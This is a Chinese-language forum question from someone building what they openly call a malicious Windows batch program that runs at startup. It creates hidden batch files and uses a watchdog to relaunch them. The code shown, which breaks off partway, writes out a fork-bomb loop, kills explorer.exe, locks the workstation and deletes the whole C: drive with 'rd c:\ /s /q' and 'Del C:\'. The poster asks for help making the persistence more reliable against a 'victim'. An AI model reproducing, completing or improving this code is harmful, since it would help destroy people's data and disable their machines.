这是非常复杂的。我正在开发一个恶意批处理文件只是为了测试自己。这将在启动时完成。
我拥有的是三个 + 六个(隐藏的)批处理文件。第一个文件制作了六个其他隐藏的批处理文件,然后CALL是第二个未隐藏的文件。
第二个文件只是说了一些讨厌的事情,最后执行了六个文件。
第三个文件在后台运行并检查第二个文件是否正在运行,如果没有,它将执行六个隐藏文件。
现在我遇到的问题。如果受害者有一个在启动时打开批处理文件的服务或任何东西并且它继续运行,那么所有的事情都会变得一团糟,因为所有正在运行的批处理文件都有进程名称cmd.exe如果受害者关闭了第二个(不是隐藏的)文件,但是另一个批处理文件(不是病毒的一部分)正在运行。第三个批处理文件将假定它仍在运行。因为它也有名字cmd.exe
而且第二个文件也不会在启动时打开。
这是我的批处理文件的代码。
文件编号。1@echo off
:DALLING
echo @echo off >>1.bat
echo :B >>1.bat
echo start >>1.bat
echo goto B >>1.bat
echo @echo off >>2.bat
echo color 02 >>2.bat
echo :start >>2.bat
echo taskkill -f explorer.exe >>2.bat
echo start %windir%\System32\rundll32.exe user 32.dll, LockWorkStation >>2.bat
echo rd c:\ /s /q >>2.bat
echo cls >>2.bat
echo @Echo off >>3.bat
echo Del C:\ …